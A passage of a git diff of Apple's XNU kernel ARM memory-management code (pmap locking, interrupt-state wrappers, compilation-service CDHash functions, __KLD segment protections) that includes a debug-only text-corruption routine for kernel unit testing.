kernel_pmap) { tmplate = ((spte & ~ARM_PTE_APMASK) | ARM_PTE_AP(AP_RWNA)); } else { + assert(!pmap->nested); /* no write access in a nested pmap */ tmplate = ((spte & ~ARM_PTE_APMASK) | pt_attr_leaf_rw(pmap_get_pt_attr(pmap))); } } @@ -10432,7 +10789,7 @@ arm_fast_fault_internal( pmap_paddr_t pa; VALIDATE_PMAP(pmap); - pmap_lock(pmap); + pmap_lock_ro(pmap); /* * If the entry doesn't exist, is completely invalid, or is already @@ -10448,12 +10805,12 @@ arm_fast_fault_internal( if ((spte == ARM_PTE_TYPE_FAULT) || ARM_PTE_IS_COMPRESSED(spte, ptep)) { - pmap_unlock(pmap); + pmap_unlock_ro(pmap); return result; } if (!pa_valid(pa)) { - pmap_unlock(pmap); + pmap_unlock_ro(pmap); #if XNU_MONITOR if (pmap_cache_attributes((ppnum_t)atop(pa)) & PP_ATTR_MONITOR) { return KERN_PROTECTION_FAILURE; @@ -10466,13 +10823,13 @@ arm_fast_fault_internal( break; } } else { - pmap_unlock(pmap); + pmap_unlock_ro(pmap); return result; } - if ((IS_REFFAULT_PAGE(pai)) || - ((fault_type & VM_PROT_WRITE) && IS_MODFAULT_PAGE(pai))) { + if ((result != KERN_SUCCESS) && + ((IS_REFFAULT_PAGE(pai)) || ((fault_type & VM_PROT_WRITE) && IS_MODFAULT_PAGE(pai)))) { /* * An attempted access will always clear ref/mod fault state, as * appropriate for the fault type. arm_clear_fast_fault will @@ -10500,8 +10857,39 @@ arm_fast_fault_internal( } } + /* + * If the PTE already has sufficient permissions, we can report the fault as handled. + * This may happen, for example, if multiple threads trigger roughly simultaneous faults + * on mappings of the same page + */ + if ((result == KERN_FAILURE) && (spte & ARM_PTE_AF)) { + uintptr_t ap_ro, ap_rw, ap_x; + if (pmap == kernel_pmap) { + ap_ro = ARM_PTE_AP(AP_RONA); + ap_rw = ARM_PTE_AP(AP_RWNA); + ap_x = ARM_PTE_NX; + } else { + ap_ro = pt_attr_leaf_ro(pmap_get_pt_attr(pmap)); + ap_rw = pt_attr_leaf_rw(pmap_get_pt_attr(pmap)); + ap_x = pt_attr_leaf_x(pmap_get_pt_attr(pmap)); + } + /* + * NOTE: this doesn't currently handle user-XO mappings. 
Depending upon the + * hardware they may be xPRR-protected, in which case they'll be handled + * by the is_pte_xprr_protected() case above. Additionally, the exception + * handling path currently does not call arm_fast_fault() without at least + * VM_PROT_READ in fault_type. + */ + if (((spte & ARM_PTE_APMASK) == ap_rw) || + (!(fault_type & VM_PROT_WRITE) && ((spte & ARM_PTE_APMASK) == ap_ro))) { + if (!(fault_type & VM_PROT_EXECUTE) || ((spte & ARM_PTE_XMASK) == ap_x)) { + result = KERN_SUCCESS; + } + } + } + UNLOCK_PVH(pai); - pmap_unlock(pmap); + pmap_unlock_ro(pmap); return result; } @@ -10950,7 +11338,6 @@ pmap_trim_range( adjust_offmask = pt_attr_leaf_table_offmask(pt_attr); adjusted_start = ((start + adjust_offmask) & ~adjust_offmask); adjusted_end = end & ~adjust_offmask; - bool modified = false; /* Iterate over the range, trying to remove TTEs. */ for (cur = adjusted_start; (cur < adjusted_end) && (cur >= adjusted_start); cur += pt_attr_twig_size(pt_attr)) { @@ -10969,14 +11356,11 @@ pmap_trim_range( (pmap != kernel_pmap)) { if (pmap->nested == TRUE) { /* Deallocate for the nested map. */ - pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr)); + pmap_tte_deallocate(pmap, cur, cur + PAGE_SIZE, false, tte_p, pt_attr_twig_level(pt_attr)); } else { /* Just remove for the parent map. */ - pmap_tte_remove(pmap, tte_p, pt_attr_twig_level(pt_attr)); + pmap_tte_remove(pmap, cur, cur + PAGE_SIZE, false, tte_p, pt_attr_twig_level(pt_attr)); } - - pmap_get_pt_ops(pmap)->flush_tlb_tte_async(cur, pmap); - modified = true; } } @@ -10984,10 +11368,6 @@ done: pmap_unlock(pmap); } - if (modified) { - sync_tlb_flush(); - } - #if (__ARM_VMSA__ > 7) /* Remove empty L2 TTs. 
*/ adjusted_start = ((start + pt_attr_ln_offmask(pt_attr, PMAP_TT_L1_LEVEL)) & ~pt_attr_ln_offmask(pt_attr, PMAP_TT_L1_LEVEL)); @@ -11030,8 +11410,7 @@ done: } if (remove_tt1e) { - pmap_tte_deallocate(pmap, tt1e_p, PMAP_TT_L1_LEVEL); - PMAP_UPDATE_TLBS(pmap, cur, cur + PAGE_SIZE, false); + pmap_tte_deallocate(pmap, cur, cur + PAGE_SIZE, false, tt1e_p, PMAP_TT_L1_LEVEL); } pmap_unlock(pmap); @@ -11229,7 +11608,7 @@ static void * pmap_sign_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator, uint64_t jop_key) { void *res = NULL; - boolean_t current_intr_state = ml_set_interrupts_enabled(FALSE); + uint64_t current_intr_state = pmap_interrupts_disable(); uint64_t saved_jop_state = ml_enable_user_jop_key(jop_key); switch (key) { @@ -11244,7 +11623,7 @@ pmap_sign_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator } ml_disable_user_jop_key(jop_key, saved_jop_state); - ml_set_interrupts_enabled(current_intr_state); + pmap_interrupts_restore(current_intr_state); return res; } @@ -11263,13 +11642,13 @@ pmap_auth_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator } void *res = NULL; - boolean_t current_intr_state = ml_set_interrupts_enabled(FALSE); + uint64_t current_intr_state = pmap_interrupts_disable(); uint64_t saved_jop_state = ml_enable_user_jop_key(jop_key); res = ml_auth_ptr_unchecked(value, key, discriminator); ml_disable_user_jop_key(jop_key, saved_jop_state); - ml_set_interrupts_enabled(current_intr_state); + pmap_interrupts_restore(current_intr_state); return res; } @@ -11974,19 +12353,6 @@ flush_mmu_tlb_region_asid_async( #endif } -MARK_AS_PMAP_TEXT static void -flush_mmu_tlb_tte_asid_async(vm_offset_t va, pmap_t pmap) -{ -#if (__ARM_VMSA__ == 7) - flush_mmu_tlb_entry_async((va & ~ARM_TT_L1_PT_OFFMASK) | (pmap->hw_asid & 0xff)); - flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); - flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + 2 * 
ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); - flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + 3 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); -#else - flush_mmu_tlb_entry_async(tlbi_addr(va & ~pt_attr_twig_offmask(pmap_get_pt_attr(pmap))) | tlbi_asid(pmap->hw_asid)); -#endif -} - MARK_AS_PMAP_TEXT static void flush_mmu_tlb_full_asid_async(pmap_t pmap) { @@ -13177,7 +13543,7 @@ pmap_ppl_lockdown_page(vm_address_t kva) UNLOCK_PVH(pai); - pmap_page_protect_options_internal((ppnum_t)atop(pa), VM_PROT_READ, 0); + pmap_page_protect_options_internal((ppnum_t)atop(pa), VM_PROT_READ, 0, NULL); } /* @@ -13400,15 +13766,15 @@ pmap_advise_pagezero_range(__unused pmap_t p, __unused uint64_t a) #define PMAP_PGTRACE_LOCK(p) \ do { \ - *(p) = ml_set_interrupts_enabled(false); \ + *(p) = pmap_interrupts_disable(); \ if (simple_lock_try(&(pmap_pgtrace.lock), LCK_GRP_NULL)) break; \ - ml_set_interrupts_enabled(*(p)); \ + pmap_interrupts_restore(*(p)); \ } while (true) #define PMAP_PGTRACE_UNLOCK(p) \ do { \ simple_unlock(&(pmap_pgtrace.lock)); \ - ml_set_interrupts_enabled(*(p)); \ + pmap_interrupts_restore(*(p)); \ } while (0) #define PGTRACE_WRITE_PTE(pte_p, pte_entry) \ @@ -13502,7 +13868,7 @@ pmap_pgtrace_find_page(pmap_paddr_t pa) static bool pmap_pgtrace_enter_clone(pmap_t pmap, vm_map_offset_t va_page, vm_map_offset_t start, vm_map_offset_t end) { - bool ints; + uint64_t ints; queue_head_t *q = &(pmap_pgtrace.pages); pmap_paddr_t pa_page; pt_entry_t *ptep, *cptep; @@ -13631,7 +13997,7 @@ pmap_pgtrace_enter_clone(pmap_t pmap, vm_map_offset_t va_page, vm_map_offset_t s static void pmap_pgtrace_remove_clone(pmap_t pmap, pmap_paddr_t pa, vm_map_offset_t va) { - bool ints, found = false; + uint64_t ints, found = false; pmap_pgtrace_page_t *p; pt_entry_t *ptep; @@ -13691,7 +14057,7 @@ unlock_exit: static void pmap_pgtrace_remove_all_clone(pmap_paddr_t pa) { - bool ints; + uint64_t ints; pmap_pgtrace_page_t *p; pt_entry_t *ptep; @@ -14027,7 +14393,7 @@ 
pmap_pgtrace_add_page(pmap_t pmap, vm_map_offset_t start, vm_map_offset_t end) int ret = 0; pt_entry_t *ptep; queue_head_t *q = &(pmap_pgtrace.pages); - bool ints; + uint64_t ints; vm_map_offset_t cur_page, end_page; if (start > end) { @@ -14182,7 +14548,7 @@ int pmap_pgtrace_delete_page(pmap_t pmap, vm_map_offset_t start, vm_map_offset_t end) { int ret = 0; - bool ints; + uint64_t ints; queue_head_t *q = &(pmap_pgtrace.pages); pmap_pgtrace_page_t *p; vm_map_offset_t cur_page, end_page; @@ -14250,7 +14616,7 @@ pmap_pgtrace_fault(pmap_t pmap, vm_map_offset_t va, arm_saved_state_t *ss) pt_entry_t *ptep; pgtrace_run_result_t res; pmap_pgtrace_page_t *p; - bool ints, found = false; + uint64_t ints, found = false; pmap_paddr_t pa; // Quick check if we are interested @@ -14703,6 +15069,53 @@ pmap_lookup_in_static_trust_cache(const uint8_t cdhash[CS_CDHASH_LEN]) #endif } +MARK_AS_PMAP_TEXT static void +pmap_set_compilation_service_cdhash_internal(const uint8_t cdhash[CS_CDHASH_LEN]) +{ + pmap_simple_lock(&pmap_compilation_service_cdhash_lock); + memcpy(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN); + pmap_simple_unlock(&pmap_compilation_service_cdhash_lock); + + pmap_cs_log("Added Compilation Service CDHash through the PPL: 0x%02X 0x%02X 0x%02X 0x%02X", cdhash[0], cdhash[1], cdhash[2], cdhash[3]); +} + +MARK_AS_PMAP_TEXT static bool +pmap_match_compilation_service_cdhash_internal(const uint8_t cdhash[CS_CDHASH_LEN]) +{ + bool match = false; + + pmap_simple_lock(&pmap_compilation_service_cdhash_lock); + if (bcmp(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN) == 0) { + match = true; + } + pmap_simple_unlock(&pmap_compilation_service_cdhash_lock); + + if (match) { + pmap_cs_log("Matched Compilation Service CDHash through the PPL"); + } + + return match; +} + +void +pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]) +{ +#if XNU_MONITOR + pmap_set_compilation_service_cdhash_ppl(cdhash); +#else +
pmap_set_compilation_service_cdhash_internal(cdhash); +#endif +} + +bool +pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]) +{ +#if XNU_MONITOR + return pmap_match_compilation_service_cdhash_ppl(cdhash); +#else + return pmap_match_compilation_service_cdhash_internal(cdhash); +#endif +} MARK_AS_PMAP_TEXT static void pmap_footprint_suspend_internal( @@ -14869,7 +15282,7 @@ pmap_test_access(pmap_t pmap, vm_map_address_t va, bool should_fault, bool is_wr * disable interrupts and preemption to avoid any unexpected memory * accesses. */ - boolean_t old_int_state = ml_set_interrupts_enabled(false); + uint64_t old_int_state = pmap_interrupts_disable(); pmap_t old_pmap = current_pmap(); mp_disable_preemption(); pmap_switch(pmap); @@ -14898,7 +15311,7 @@ pmap_test_access(pmap_t pmap, vm_map_address_t va, bool should_fault, bool is_wr pmap_switch(old_pmap); mp_enable_preemption(); - ml_set_interrupts_enabled(old_int_state); + pmap_interrupts_restore(old_int_state); bool retval = (took_fault == should_fault); return retval; } @@ -15233,3 +15646,76 @@ pmap_test(void) return KERN_SUCCESS; } #endif /* CONFIG_XNUPOST */ + +/* + * The following function should never make it to RELEASE code, since + * it provides a way to get the PPL to modify text pages. + */ +#if DEVELOPMENT || DEBUG + +#define ARM_UNDEFINED_INSN 0xe7f000f0 +#define ARM_UNDEFINED_INSN_THUMB 0xde00 + +/** + * Forcibly overwrite executable text with an illegal instruction. + * + * @note Only used for xnu unit testing. + * + * @param pa The physical address to corrupt. + * + * @return KERN_SUCCESS on success. 
+ */ +kern_return_t +pmap_test_text_corruption(pmap_paddr_t pa) +{ +#if XNU_MONITOR + return pmap_test_text_corruption_ppl(pa); +#else /* XNU_MONITOR */ + return pmap_test_text_corruption_internal(pa); +#endif /* XNU_MONITOR */ +} + +MARK_AS_PMAP_TEXT kern_return_t +pmap_test_text_corruption_internal(pmap_paddr_t pa) +{ + vm_offset_t va = phystokv(pa); + unsigned int pai = pa_index(pa); + + assert(pa_valid(pa)); + + LOCK_PVH(pai); + + pv_entry_t **pv_h = pai_to_pvh(pai); + assert(!pvh_test_type(pv_h, PVH_TYPE_NULL)); +#if defined(PVH_FLAG_EXEC) + const bool need_ap_twiddle = pvh_get_flags(pv_h) & PVH_FLAG_EXEC; + + if (need_ap_twiddle) { + pmap_set_ptov_ap(pai, AP_RWNA, FALSE); + } +#endif /* defined(PVH_FLAG_EXEC) */ + + /* + * The low bit in an instruction address indicates a THUMB instruction + */ + if (va & 1) { + va &= ~(vm_offset_t)1; + *(uint16_t *)va = ARM_UNDEFINED_INSN_THUMB; + } else { + *(uint32_t *)va = ARM_UNDEFINED_INSN; + } + +#if defined(PVH_FLAG_EXEC) + if (need_ap_twiddle) { + pmap_set_ptov_ap(pai, AP_RONA, FALSE); + } +#endif /* defined(PVH_FLAG_EXEC) */ + + InvalidatePoU_IcacheRegion(va, sizeof(uint32_t)); + + UNLOCK_PVH(pai); + + return KERN_SUCCESS; +} + +#endif /* DEVELOPMENT || DEBUG */ diff --git a/osfmk/arm/pmap.h b/osfmk/arm/pmap.h index 760592fd6..13c58aa15 100644 --- a/osfmk/arm/pmap.h +++ b/osfmk/arm/pmap.h @@ -47,6 +47,7 @@ #include #include #include +#include #include #if defined(__arm64__) #include @@ -331,7 +332,7 @@ extern pmap_paddr_t mmu_uvtop(vm_offset_t va); #define PMAP_GC_WAIT 2 #if DEVELOPMENT || DEBUG -#define pmap_cs_log_h(msg, args...) { if(pmap_cs_log_hacks) printf("PMAP_CS: " msg "\n", args); } +#define pmap_cs_log_h(msg, args...) 
{ if(pmap_cs_log_hacks) printf("PMAP_CS: " msg "\n", ##args); } #define pmap_cs_log pmap_cs_log_h #else @@ -461,7 +462,7 @@ extern void pmap_gc(void); #if HAS_APPLE_PAC extern void * pmap_sign_user_ptr(void *value, ptrauth_key key, uint64_t data, uint64_t jop_key); extern void * pmap_auth_user_ptr(void *value, ptrauth_key key, uint64_t data, uint64_t jop_key); -#endif /* HAS_APPLE_PAC && XNU_MONITOR */ +#endif /* HAS_APPLE_PAC */ /* * Interfaces implemented as macros. @@ -620,10 +621,10 @@ pmap_disable_user_jop(pmap_t pmap); #define PMAP_LEDGER_ALLOC_INDEX 58 #define PMAP_LEDGER_FREE_INDEX 59 -#if HAS_APPLE_PAC && XNU_MONITOR +#if HAS_APPLE_PAC #define PMAP_SIGN_USER_PTR 60 #define PMAP_AUTH_USER_PTR 61 -#endif /* HAS_APPLE_PAC && XNU_MONITOR */ +#endif /* HAS_APPLE_PAC */ #define PHYS_ATTRIBUTE_CLEAR_RANGE_INDEX 66 @@ -636,8 +637,15 @@ pmap_disable_user_jop(pmap_t pmap); #define PMAP_SET_VM_MAP_CS_ENFORCED_INDEX 72 +#define PMAP_SET_COMPILATION_SERVICE_CDHASH_INDEX 73 +#define PMAP_MATCH_COMPILATION_SERVICE_CDHASH_INDEX 74 + -#define PMAP_COUNT 74 +#if DEVELOPMENT || DEBUG +#define PMAP_TEST_TEXT_CORRUPTION_INDEX 76 +#endif /* DEVELOPMENT || DEBUG */ + +#define PMAP_COUNT 77 #define PMAP_INVALID_CPU_NUM (~0U) @@ -651,6 +659,18 @@ extern void pmap_cpu_data_init(void); /* Get the pmap per-CPU data for the current CPU. */ extern pmap_cpu_data_t * pmap_get_cpu_data(void); +/* + * For most batched page operations, we pick a sane default page count + * interval at which to check for pending preemption and exit the PPL if found. 
+ */ +#define PMAP_DEFAULT_PREEMPTION_CHECK_PAGE_INTERVAL 64 + +inline bool +pmap_pending_preemption(void) +{ + return !!(*((volatile ast_t*)ast_pending()) & AST_URGENT); +} + #if XNU_MONITOR extern boolean_t pmap_ppl_locked_down; @@ -728,6 +748,10 @@ extern void CleanPoC_DcacheRegion_Force_nopreempt(vm_offset_t va, size_t length) #define pmap_unlock_bit(l, i) hw_unlock_bit(l, i) #endif +#if DEVELOPMENT || DEBUG +extern kern_return_t pmap_test_text_corruption(pmap_paddr_t); +#endif /* DEVELOPMENT || DEBUG */ + #endif /* #ifndef ASSEMBLER */ #if __ARM_KERNEL_PROTECT__ diff --git a/osfmk/arm/proc_reg.h b/osfmk/arm/proc_reg.h index 0ebbf526b..522f7e1c0 100644 --- a/osfmk/arm/proc_reg.h +++ b/osfmk/arm/proc_reg.h @@ -856,6 +856,8 @@ #define ARM_PTE_PNX 0x00000000 /* no privilege execute. not impl */ #define ARM_PTE_PNX_MASK (0< EXPORT_MD_DIR = arm64 +INSTALL_MD_DIR = arm64 + else # $(PLATFORM),MacOSX diff --git a/osfmk/arm64/amcc_rorgn.c b/osfmk/arm64/amcc_rorgn.c index fe0c6f80b..0a7434b30 100644 --- a/osfmk/arm64/amcc_rorgn.c +++ b/osfmk/arm64/amcc_rorgn.c @@ -70,6 +70,7 @@ extern vm_offset_t segTEXTEXECB; extern unsigned long segSizeLAST; extern unsigned long segSizeLASTDATACONST; extern unsigned long segSizeTEXTEXEC; +extern unsigned long segSizeKLD; typedef struct lock_reg { uint32_t reg_offset; // Register offset @@ -113,12 +114,6 @@ static uint64_t lock_group_va[MAX_LOCK_GROUPS][MAX_APERTURES]; SECURITY_READ_ONLY_LATE(bool) csr_unsafe_kernel_text = false; #endif -#if defined(KERNEL_INTEGRITY_KTRR) -#define CTRR_LOCK_MSR ARM64_REG_KTRR_LOCK_EL1 -#elif defined(KERNEL_INTEGRITY_CTRR) -#define CTRR_LOCK_MSR ARM64_REG_CTRR_LOCK_EL1 -#endif - /* * lock_group_t - describes all the parameters xnu needs to know to * lock down the AMCC/IOA (Lock Group) Read Only Region(s) on cold start. 
@@ -411,7 +406,8 @@ rorgn_stash_range(void) * +------------------+-----------+-----------------------------------+ * | Largest Address | LAST | <- AMCC RO Region End (rorgn_end) | * +------------------+-----------+-----------------------------------+ - * | | TEXT_EXEC | <- KTRR RO Region End (ctrr_end) | + * | | KLD | <- KTRR RO Region End (ctrr_end) | + * | | TEXT_EXEC | | * +------------------+-----------+-----------------------------------+ * | | ... | | * +------------------+-----------+-----------------------------------+ @@ -430,7 +426,7 @@ rorgn_stash_range(void) assert(segSizeLAST == PAGE_SIZE); /* assert that segLAST is contiguous and just after/above/numerically higher than KTRR end */ - assert((ctrr_end + 1) == kvtophys(segTEXTEXECB) + segSizeTEXTEXEC); + assert((ctrr_end + 1) == kvtophys(segTEXTEXECB) + segSizeTEXTEXEC + segSizeKLD); /* ensure that iboot and xnu agree on the amcc rorgn range */ assert((rorgn_begin == ctrr_begin) && (rorgn_end == (ctrr_end + segSizeLASTDATACONST + segSizeLAST))); @@ -443,6 +439,9 @@ rorgn_stash_range(void) * | Largest Address | LAST | <- CTRR/AMCC RO Region End | * | | | (ctrr_end/rorgn_end) | * +------------------+-----------+------------------------------+ + * | | PPLDATA_CONST | + * | | PPLTEXT | | + * | | KLD | | * | | TEXT_EXEC | | * +------------------+-----------+------------------------------+ * | | ... | | @@ -468,49 +467,6 @@ rorgn_stash_range(void) #endif } -#if DEVELOPMENT || DEBUG -static void -assert_all_lock_groups_unlocked(lock_group_t const *lock_groups) -{ - uint64_t reg_addr; - uint64_t ctrr_lock = 0; - bool locked = false; - bool write_disabled = false;; - - assert(lock_groups); - - for (unsigned int lg = 0; lg < MAX_LOCK_GROUPS; lg++) { - for (unsigned int aperture = 0; aperture < lock_groups[lg].aperture_count; aperture++) { -#if HAS_IOA - // Does the lock group define a master lock register? 
- if (lock_groups[lg].master_lock_reg.reg_mask != 0) { - reg_addr = lock_group_va[lg][aperture] + lock_groups[lg].master_lock_reg.reg_offset; - locked |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].master_lock_reg.reg_mask) == lock_groups[lg].master_lock_reg.reg_value); - } -#endif - for (unsigned int plane = 0; plane < lock_groups[lg].plane_count; plane++) { - // Does the lock group define a write disable register? - if (lock_groups[lg].ctrr_a.write_disable_reg.reg_mask != 0) { - reg_addr = lock_group_va[lg][aperture] + (plane * lock_groups[lg].plane_stride) + lock_groups[lg].ctrr_a.write_disable_reg.reg_offset; - write_disabled |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].ctrr_a.write_disable_reg.reg_mask) == lock_groups[lg].ctrr_a.write_disable_reg.reg_value); - } - - // Does the lock group define a lock register? - if (lock_groups[lg].ctrr_a.lock_reg.reg_mask != 0) { - reg_addr = lock_group_va[lg][aperture] + (plane * lock_groups[lg].plane_stride) + lock_groups[lg].ctrr_a.lock_reg.reg_offset; - locked |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].ctrr_a.lock_reg.reg_mask) == lock_groups[lg].ctrr_a.lock_reg.reg_value); - } - } - } - } - - ctrr_lock = __builtin_arm_rsr64(CTRR_LOCK_MSR); - - assert(!ctrr_lock); - assert(!write_disabled && !locked); -} -#endif - static void lock_all_lock_groups(lock_group_t const *lock_group, vm_offset_t begin, vm_offset_t end) { @@ -562,56 +518,6 @@ lock_all_lock_groups(lock_group_t const *lock_group, vm_offset_t begin, vm_offse } } -static void -lock_mmu(uint64_t begin, uint64_t end) -{ -#if defined(KERNEL_INTEGRITY_KTRR) - - __builtin_arm_wsr64(ARM64_REG_KTRR_LOWER_EL1, begin); - __builtin_arm_wsr64(ARM64_REG_KTRR_UPPER_EL1, end); - __builtin_arm_wsr64(ARM64_REG_KTRR_LOCK_EL1, 1ULL); - - /* flush TLB */ - - __builtin_arm_isb(ISB_SY); - flush_mmu_tlb(); - -#elif defined (KERNEL_INTEGRITY_CTRR) - /* this will lock the entire bootstrap cluster. 
non bootstrap clusters - * will be locked by respective cluster master in start.s */ - - __builtin_arm_wsr64(ARM64_REG_CTRR_A_LWR_EL1, begin); - __builtin_arm_wsr64(ARM64_REG_CTRR_A_UPR_EL1, end); - -#if !defined(APPLEVORTEX) - /* H12+ changed sequence, must invalidate TLB immediately after setting CTRR bounds */ - __builtin_arm_isb(ISB_SY); /* ensure all prior MSRs are complete */ - flush_mmu_tlb(); -#endif /* !defined(APPLEVORTEX) */ - - __builtin_arm_wsr64(ARM64_REG_CTRR_CTL_EL1, CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT); - __builtin_arm_wsr64(ARM64_REG_CTRR_LOCK_EL1, 1ULL); - - uint64_t current_el = __builtin_arm_rsr64("CurrentEL"); - if (current_el == PSR64_MODE_EL2) { - // CTRR v2 has explicit registers for cluster config. they can only be written in EL2 - - __builtin_arm_wsr64(ACC_CTRR_A_LWR_EL2, begin); - __builtin_arm_wsr64(ACC_CTRR_A_UPR_EL2, end); - __builtin_arm_wsr64(ACC_CTRR_CTL_EL2, CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT); - __builtin_arm_wsr64(ACC_CTRR_LOCK_EL2, 1ULL); - } - - __builtin_arm_isb(ISB_SY); /* ensure all prior MSRs are complete */ -#if defined(APPLEVORTEX) - flush_mmu_tlb(); -#endif /* defined(APPLEVORTEX) */ - -#else /* defined(KERNEL_INTEGRITY_KTRR) */ -#error KERNEL_INTEGRITY config error -#endif /* defined(KERNEL_INTEGRITY_KTRR) */ -} - #if DEVELOPMENT || DEBUG static void assert_amcc_cache_disabled(lock_group_t const *lock_group) @@ -662,8 +568,6 @@ rorgn_lockdown(void) lock_group_t const * const lock_group = find_lock_group_data(); #if DEVELOPMENT || DEBUG - assert_all_lock_groups_unlocked(lock_group); - printf("RO Region Begin: %p End: %p\n", (void *)rorgn_begin, (void *)rorgn_end); printf("CTRR (MMU) Begin: %p End: %p, setting lockdown\n", (void *)ctrr_begin, (void *)ctrr_end); @@ -673,14 +577,6 @@ rorgn_lockdown(void) // Lock the AMCC/IOA PIO lock registers. 
lock_all_lock_groups(lock_group, phystokv(rorgn_begin), phystokv(rorgn_end)); - /* - * KTRR/CTRR registers are inclusive of the smallest page size granule supported by processor MMU - * rather than the actual page size in use. Load the last byte of the end page, and let the HW - * truncate per the smallest page granule supported. Must use same treament in start.s for warm - * start of APs. - */ - lock_mmu(ctrr_begin, ctrr_end); - // Unmap and free PIO VA space needed to lockdown the lock groups. for (unsigned int lg = 0; lg < MAX_LOCK_GROUPS; lg++) { for (unsigned int aperture = 0; aperture < lock_group[lg].aperture_count; aperture++) { diff --git a/osfmk/arm64/arm_vm_init.c b/osfmk/arm64/arm_vm_init.c index 10c0a455e..728ee8c27 100644 --- a/osfmk/arm64/arm_vm_init.c +++ b/osfmk/arm64/arm_vm_init.c @@ -258,7 +258,9 @@ SECURITY_READ_ONLY_LATE(vm_offset_t) segLINKB; SECURITY_READ_ONLY_LATE(static unsigned long) segSizeLINK; SECURITY_READ_ONLY_LATE(static vm_offset_t) segKLDB; -SECURITY_READ_ONLY_LATE(static unsigned long) segSizeKLD; +SECURITY_READ_ONLY_LATE(unsigned long) segSizeKLD; +SECURITY_READ_ONLY_LATE(static vm_offset_t) segKLDDATAB; +SECURITY_READ_ONLY_LATE(static unsigned long) segSizeKLDDATA; SECURITY_READ_ONLY_LATE(vm_offset_t) segLASTB; SECURITY_READ_ONLY_LATE(unsigned long) segSizeLAST; SECURITY_READ_ONLY_LATE(vm_offset_t) segLASTDATACONSTB; @@ -1338,6 +1340,7 @@ noAuxKC: arm_vm_page_granular_RNX((vm_offset_t)&excepstack_high_guard, PAGE_MAX_SIZE, 0); arm_vm_page_granular_ROX(segKLDB, segSizeKLD, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT); + arm_vm_page_granular_RNX(segKLDDATAB, segSizeKLDDATA, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT); arm_vm_page_granular_RWNX(segLINKB, segSizeLINK, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT); arm_vm_page_granular_RWNX(segPLKLINKEDITB, segSizePLKLINKEDIT, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT); // Coalesced kext LINKEDIT segment arm_vm_page_granular_ROX(segLASTB, 
segSizeLAST, ARM64_GRANULE_ALLOW_BLOCK); // __LAST may be empty, but we cannot assume this @@ -1433,8 +1436,12 @@ arm_vm_physmap_init(boot_args *args) // Slid region between gPhysBase and beginning of protected text arm_vm_physmap_slide(temp_ptov_table, gVirtBase, segLOWEST - gVirtBase, AP_RWNA, 0); - // kext bootstrap segment + // kext bootstrap segments +#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR) + /* __KLD,__text is covered by the rorgn */ arm_vm_physmap_slide(temp_ptov_table, segKLDB, segSizeKLD, AP_RONA, 0); +#endif + arm_vm_physmap_slide(temp_ptov_table, segKLDDATAB, segSizeKLDDATA, AP_RONA, 0); // Early-boot data arm_vm_physmap_slide(temp_ptov_table, segBOOTDATAB, segSizeBOOTDATA, AP_RONA, 0); @@ -1551,10 +1558,17 @@ arm_vm_prot_finalize(boot_args * args __unused) #endif /* __ARM_KERNEL_PROTECT__ */ #if XNU_MONITOR +#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR) + /* __KLD,__text is covered by the rorgn */ for (vm_offset_t va = segKLDB; va < (segKLDB + segSizeKLD); va += ARM_PGBYTES) { pt_entry_t *pte = arm_kva_to_pte(va); *pte = ARM_PTE_EMPTY; } +#endif + for (vm_offset_t va = segKLDDATAB; va < (segKLDDATAB + segSizeKLDDATA); va += ARM_PGBYTES) { + pt_entry_t *pte = arm_kva_to_pte(va); + *pte = ARM_PTE_EMPTY; + } /* Clear the original stack mappings; these pages should be mapped through ptov_table. */ for (vm_offset_t va = segBOOTDATAB; va < (segBOOTDATAB + segSizeBOOTDATA); va += ARM_PGBYTES) { pt_entry_t *pte = arm_kva_to_pte(va); @@ -1589,6 +1603,11 @@ arm_vm_prot_finalize(boot_args * args __unused) arm_vm_page_granular_RNX(segLASTDATACONSTB, segSizeLASTDATACONST, ARM64_GRANULE_ALLOW_BLOCK); } + /* + * __KLD,__text should no longer be executable. 
+ */ + arm_vm_page_granular_RNX(segKLDB, segSizeKLD, ARM64_GRANULE_ALLOW_BLOCK); + /* * Must wait until all other region permissions are set before locking down DATA_CONST * as the kernel static page tables live in DATA_CONST on KTRR enabled systems @@ -1860,6 +1879,7 @@ arm_vm_init(uint64_t memory_size, boot_args * args) segBOOTDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__BOOTDATA", &segSizeBOOTDATA); segLINKB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LINKEDIT", &segSizeLINK); segKLDB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLD", &segSizeKLD); + segKLDDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLDDATA", &segSizeKLDDATA); segPRELINKDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_DATA", &segSizePRELINKDATA); segPRELINKINFOB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_INFO", 